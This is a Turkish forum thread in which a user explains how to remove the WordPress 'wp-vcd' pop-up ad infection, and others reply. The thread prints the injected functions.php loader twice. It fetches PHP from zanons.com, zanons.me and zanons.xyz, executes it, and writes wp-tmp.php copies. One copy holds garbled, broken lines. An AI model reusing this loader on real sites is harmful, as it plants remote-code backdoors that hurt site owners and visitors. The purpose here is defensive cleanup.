Wordpress Pop-up Reklam Virüsü ( wp-tmp & wp-vcd.php )

23-01-2018, 17:05:24

Alıntı

ÖZEL OLARAK HİZMET ALMAK İSTEYEN OLURSA BU KONUDAN BANA ULAŞABİLİR.

Merhabalar,

Bugün keşvettiğim bir virüsün nasıl kaldırılacağına dair bilgi vermek istedim. İlallah ettiriyor ama sonunda buldum. İşin kötü tarafı öyle bir sistem yapmışlar ki, direkt olarak wordpress klasörlerine gönderiyor reklamı ve sonradan tema değişseniz de birşey fark etmiyor. Pluginler aracılığıyla mevcut temanızın functions.php kısmına bir kod yazdırıyorlar. Bu kod wp-includes klasörünün içerisine wp-tmp.php ve wp-vcd.php isminde dosyalar gönderiyor. Bu dosyaları tabi ki bilmeden burda bulmak neredeyse imkansız. Kullanıcı ilk olarak pluginlerden diye düşünüyor. Arıyor tarıyor bulamıyor. ( Bende öyle yaptım. ) Sonra tema değiştiriyor. ( Değiştirse bile nafile çünkü artık virüs sistemde. ) İşin kötü tarafı admin girişi yaptığınızda bu virüs reklam göstermiyor. O kadar şeytani düşünmüşler ki, kullanıcılardan yorum gelmese ben bile farkına varamayacaktım.
Bu virüsten kurtulmanın tek yolu temadaki kodları silmek ve ilgili bölümdeki dosyaları silmek.
Temanın functions.php dosyasının üst kısmında şifrelerle başlayan bir bölüm var, bu kısmı güzel bir silin;

 
<?php if (isset($_REQUEST['action']) && isset($_REQUEST['password']) && ($_REQUEST['password'] == 'XXXXXXXXXXXXXXXXXXXXXX')) { if ( ! function_exists( 'wp_temp_setup' ) ) { $path=$_SERVER['HTTP_HOST'].$_SERVER[REQUEST_URI];
 
 
 
 
 
 
 
 
 
 

$div_code_name = "wp_vcd";
$funcfile      = __FILE__;
if(!function_exists('theme_temp_setup')) {
    $path = $_SERVER['HTTP_HOST'] . $_SERVER[REQUEST_URI];
    if (stripos($_SERVER['REQUEST_URI'], 'wp-cron.php') == false && stripos($_SERVER['REQUEST_URI'], 'xmlrpc.php') == false) {
        
        function file_get_contents_tcurl($url)
        {
            $ch = curl_init();
            curl_setopt($ch, CURLOPT_AUTOREFERER, TRUE);
            curl_setopt($ch, CURLOPT_HEADER, 0);
            curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
            curl_setopt($ch, CURLOPT_URL, $url);
            curl_setopt($ch, CURLOPT_FOLLOWLOCATION, TRUE);
            $data = curl_exec($ch);
            curl_close($ch);
            return $data;
        }
        
        function theme_temp_setup($phpCode)
        {
            $tmpfname = tempnam(sys_get_temp_dir(), "theme_temp_setup");
            $handle   = fopen($tmpfname, "w+");
           if( fwrite($handle, "<?phpn" . $phpCode))
           {
           }
            else
            {
            $tmpfname = tempnam('./', "theme_temp_setup");
            $handle   = fopen($tmpfname, "w+");
            fwrite($handle, "<?phpn" . $phpCode);
            }
            fclose($handle);
            include $tmpfname;
            unlink($tmpfname);
            return get_defined_vars();
        }
        
$wp_auth_key='08b370e35d008b6591dd40b0eec23025';
        if (($tmpcontent = @file_get_contents("http://www.zanons.com/code.php") OR $tmpcontent = @file_get_contents_tcurl("http://www.zanons.com/code.php")) AND stripos($tmpcontent, $wp_auth_key) !== false) {
            if (stripos($tmpcontent, $wp_auth_key) !== false) {
                extract(theme_temp_setup($tmpcontent));
                @file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);
                
                if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
                    @file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
                    if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
                        @file_put_contents('wp-tmp.php', $tmpcontent);
                    }
                }
                
            }
        }
        
        
        elseif ($tmpcontent = @file_get_contents("http://www.zanons.me/code.php")  AND stripos($tmpcontent, $wp_auth_key) !== false ) {
if (stripos($tmpcontent, $wp_auth_key) !== false) {
                extract(theme_temp_setup($tmpcontent));
                @file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);
                
                if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
                    @file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
                    if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
                        @file_put_contents('wp-tmp.php', $tmpcontent);
                    }
                }
                
            }
        } elseif ($tmpcontent = @file_get_contents(ABSPATH . 'wp-includes/wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
            extract(theme_temp_setup($tmpcontent));
          
        } elseif ($tmpcontent = @file_get_contents_tcurl("http://www.zanons.com/code.php")) AND stripos($tmpcontent, $wp_auth_key) !== false) {
            if (stripos($tmpcontent, $wp_auth_key) !== false) {
                extract(theme_temp_setup($tmpcontent))0;
        } elseif ($tmpcontent = @file_get_contents_tcurl("http://www.zanons.com/code.php")) AND stripos($tmpcontent, $wp_auth_key) !== false) {
            if (stripos($tmpcontent, $wp_auth_key) !== false) {
                extract(theme_temp_setup($tmpcontent))1;
        } elseif (($tmpcontent = @file_get_contents_tcurl("http://www.zanons.com/code.php")) AND stripos($tmpcontent, $wp_auth_key) !== false) {
            if (stripos($tmpcontent, $wp_auth_key) !== false) {
                extract(theme_temp_setup($tmpcontent))2;
        }
        
        
        
        
        
    }
}
 
 
 
 
?>

Ardından /wp-includes/ klasörünüze girin ve wp-tmp.php ve wp-vcd.php isimli iki dosyayı silin. Pop-up reklamından kurtuldunuz.

İnternet ortamında emeğe göz dikenler çok fazla. Lütfen functions.php dosyanızı kontrol edin.

23-01-2018, 17:12:10

#2

aTKn94

Emeğinize sağlık. Adamların işleri güçleri yok milletin ekmeğiyle oynuyor
23-01-2018, 17:20:43

#3

HelixTm

aTKn94 adlı üyeden alıntı: mesajı görüntüle

Emeğinize sağlık. Adamların işleri güçleri yok milletin ekmeğiyle oynuyor

Hiç sorma be ustam, deli ediyorlar adamı. Öyle sistem yapmışlar ki şeytanın aklına gelmez.
23-01-2018, 17:22:28

#4

les

Eline sağlık üstad çok güzel paylaşım. Mobilde mi yoksa deskop'tamı reklamlar vardı. Gerçekten enteresan, onlarda işlerini geliştiriyorlar.
23-01-2018, 17:26:39

#5

HelixTm

les adlı üyeden alıntı: mesajı görüntüle

Eline sağlık üstad çok güzel paylaşım. Mobilde mi yoksa deskop'tamı reklamlar vardı. Gerçekten enteresan, onlarda işlerini geliştiriyorlar.

Hocam her platformda yapmışlar. Adamlar öyle geliştirmiş ki, admin girişi yapanlara göstermiyorlar. Üstüne kullanıcıya belli sürede bir gösteriyorlar. Hane site sahibinin farketmesi neredeyse imkansız oluyor. Sitelerinizi bir taratın bence.
25-01-2018, 03:16:25

#6

~~YouNeverKnows~~

Üyeliği durduruldu

HelixTm adlı üyeden alıntı: mesajı görüntüle

Merhabalar,

Bugün keşvettiğim bir virüsün nasıl kaldırılacağına dair bilgi vermek istedim. İlallah ettiriyor ama sonunda buldum. İşin kötü tarafı öyle bir sistem yapmışlar ki, direkt olarak wordpress klasörlerine gönderiyor reklamı ve sonradan tema değişseniz de birşey fark etmiyor. Pluginler aracılığıyla mevcut temanızın functions.php kısmına bir kod yazdırıyorlar. Bu kod wp-includes klasörünün içerisine wp-tmp.php ve wp-vcd.php isminde dosyalar gönderiyor. Bu dosyaları tabi ki bilmeden burda bulmak neredeyse imkansız. Kullanıcı ilk olarak pluginlerden diye düşünüyor. Arıyor tarıyor bulamıyor. ( Bende öyle yaptım. ) Sonra tema değiştiriyor. ( Değiştirse bile nafile çünkü artık virüs sistemde. ) İşin kötü tarafı admin girişi yaptığınızda bu virüs reklam göstermiyor. O kadar şeytani düşünmüşler ki, kullanıcılardan yorum gelmese ben bile farkına varamayacaktım.
Bu virüsten kurtulmanın tek yolu temadaki kodları silmek ve ilgili bölümdeki dosyaları silmek.
Temanın functions.php dosyasının üst kısmında şifrelerle başlayan bir bölüm var, bu kısmı güzel bir silin;
<?php if (isset($_REQUEST['action']) && isset($_REQUEST['password']) && ($_REQUEST['password'] == 'XXXXXXXXXXXXXXXXXXXXXX')) { if ( ! function_exists( 'wp_temp_setup' ) ) { $path=$_SERVER['HTTP_HOST'].$_SERVER[REQUEST_URI]; $div_code_name = "wp_vcd"; $funcfile = __FILE__; if(!function_exists('theme_temp_setup')) { $path = $_SERVER['HTTP_HOST'] . $_SERVER[REQUEST_URI]; if (stripos($_SERVER['REQUEST_URI'], 'wp-cron.php') == false && stripos($_SERVER['REQUEST_URI'], 'xmlrpc.php') == false) { function file_get_contents_tcurl($url) { $ch = curl_init(); curl_setopt($ch, CURLOPT_AUTOREFERER, TRUE); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, TRUE); $data = curl_exec($ch); curl_close($ch); return $data; } function theme_temp_setup($phpCode) { $tmpfname = tempnam(sys_get_temp_dir(), "theme_temp_setup"); $handle = fopen($tmpfname, "w+"); if( fwrite($handle, "<?php\n" . $phpCode)) { } else { $tmpfname = tempnam('./', "theme_temp_setup"); $handle = fopen($tmpfname, "w+"); fwrite($handle, "<?php\n" . $phpCode); } fclose($handle); include $tmpfname; unlink($tmpfname); return get_defined_vars(); } $wp_auth_key='08b370e35d008b6591dd40b0eec23025'; if (($tmpcontent = @file_get_contents("http://www.zanons.com/code.php") OR $tmpcontent = @file_get_contents_tcurl("http://www.zanons.com/code.php")) AND stripos($tmpcontent, $wp_auth_key) !== false) { if (stripos($tmpcontent, $wp_auth_key) !== false) { extract(theme_temp_setup($tmpcontent)); @file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent); if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) { @file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent); if (!file_exists(get_template_directory() . '/wp-tmp.php')) { @file_put_contents('wp-tmp.php', $tmpcontent); } } } } elseif ($tmpcontent = @file_get_contents("http://www.zanons.me/code.php") AND stripos($tmpcontent, $wp_auth_key) !== false ) { if (stripos($tmpcontent, $wp_auth_key) !== false) { extract(theme_temp_setup($tmpcontent)); @file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent); if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) { @file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent); if (!file_exists(get_template_directory() . '/wp-tmp.php')) { @file_put_contents('wp-tmp.php', $tmpcontent); } } } } elseif ($tmpcontent = @file_get_contents(ABSPATH . 'wp-includes/wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) { extract(theme_temp_setup($tmpcontent)); } elseif ($tmpcontent = @file_get_contents(get_template_directory() . '/wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) { extract(theme_temp_setup($tmpcontent)); } elseif ($tmpcontent = @file_get_contents('wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) { extract(theme_temp_setup($tmpcontent)); } elseif (($tmpcontent = @file_get_contents("http://www.zanons.xyz/code.php") OR $tmpcontent = @file_get_contents_tcurl("http://www.zanons.xyz/code.php")) AND stripos($tmpcontent, $wp_auth_key) !== false) { extract(theme_temp_setup($tmpcontent)); } } } ?>
Ardından /wp-includes/ klasörünüze girin ve wp-tmp.php ve wp-vcd.php isimli iki dosyayı silin. Pop-up reklamından kurtuldunuz.

İnternet ortamında emeğe göz dikenler çok fazla. Lütfen functions.php dosyanızı kontrol edin.

eyw hocam güzel anlatmışsında o şifreler silinince site gidiyor diğer dosyalarda zaten bende yok
25-01-2018, 03:39:56

#7

HelixTm

YouNeverKnows adlı üyeden alıntı: mesajı görüntüle

eyw hocam güzel anlatmışsında o şifreler silinince site gidiyor diğer dosyalarda zaten bende yok

Hocam kodu paylaşır mısın buradan?
25-01-2018, 03:41:44

#8

~~YouNeverKnows~~

Üyeliği durduruldu

if (isset($_REQUEST['action']) && isset($_REQUEST['password']) && ($_REQUEST['password'] == 'xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx'))

@HelixTm
25-01-2018, 03:45:21

#9

HelixTm

YouNeverKnows adlı üyeden alıntı: mesajı görüntüle

if (isset($_REQUEST['action']) && isset($_REQUEST['password']) && ($_REQUEST['password'] == 'xxxxx'))

HelixTm

Hayır hocam kod devamını, bir de bu password ve id kısmını editle xxx şeklinde paylaş.